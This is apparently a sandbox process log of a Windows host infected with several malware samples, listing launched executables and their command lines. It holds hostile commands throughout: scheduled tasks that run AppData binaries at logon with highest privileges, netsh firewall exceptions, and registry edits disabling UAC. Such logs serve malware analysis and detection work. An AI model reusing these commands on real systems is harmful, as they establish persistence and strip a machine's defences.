C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8eC8nmLjGccv.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0MSPcy3lGfgs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GrTxXjz1jwCY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V9DRgIUMHXOY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rVMlhZbJtSnx.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7136 -ip 7136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7136 -s 484

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gpjwRu1uMfKS.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UlHU2iZsPmmk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\networkmanager.exe

"C:\Users\Admin\Desktop\Files\networkmanager.exe"

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 248 -ip 248

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 248 -s 456

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1S2mZNnufXOJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DAeqXvwV6Ud.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YeiwQ7RofxNs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\q1wnx5ir.exe

"C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7176 -ip 7176

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 416

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsWPoyEdbx0v.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Rage.exe

"C:\Users\Admin\Desktop\Files\Rage.exe"

C:\ProgramData\wvtynvwe\AutoIt3.exe

"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x

C:\Users\Admin\Desktop\Files\856.exe

"C:\Users\Admin\Desktop\Files\856.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe

"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"

C:\Users\Admin\Desktop\Files\ciscotest.exe

"C:\Users\Admin\Desktop\Files\ciscotest.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\svc1.exe

"C:\Users\Admin\Desktop\Files\svc1.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\alexshlu.exe

"C:\Users\Admin\Desktop\Files\alexshlu.exe"

C:\Users\Admin\Desktop\Files\alexshlu.exe

"C:\Users\Admin\Desktop\Files\alexshlu.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\StUpdate.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zblqEg0ftqZ0.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HG73Nmet0qaJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\melt.txt

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe

"C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tFMKq6EdJqBP.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Windows\system32\chcp.com

chcp 65001

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tel0N9UQ34hY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\msf.exe

"C:\Users\Admin\Desktop\Files\msf.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6200 -ip 6200

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1244

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rps1Drc3i6nT.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoDrERSbzhN2.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 796 -ip 796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 1916

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\jignesh.exe

"C:\Users\Admin\Desktop\Files\jignesh.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe

"C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BvcyyA97w0hk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe

"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\Desktop\Files\svchost.exe

svchost.exe

C:\Windows\SysWOW64\rmclient.exe

rmclient.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004C8

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\yoyf.exe

"C:\Users\Admin\Desktop\Files\yoyf.exe"

C:\Users\Admin\Desktop\Files\SharpHound.exe

"C:\Users\Admin\Desktop\Files\SharpHound.exe"

C:\Users\Admin\Desktop\Files\winX32.exe

"C:\Users\Admin\Desktop\Files\winX32.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\ProgramData\sommnx\bmxe.exe

C:\ProgramData\sommnx\bmxe.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\StUpdate.exe

C:\Users\Admin\AppData\Local\Temp/StUpdate.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\g9SSX2bshVB0.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\SharpHound.exe

"C:\Users\Admin\Desktop\Files\SharpHound.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\winX32.exe

"C:\Users\Admin\Desktop\Files\winX32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WZk6Sw3oUfda.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\ProgramData\sommnx\bmxe.exe

"C:\ProgramData\sommnx\bmxe.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UJFyZlg1NKTf.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\jignesh.exe

"C:\Users\Admin\Desktop\Files\jignesh.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pHW7WegWhary.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\Discord.exe

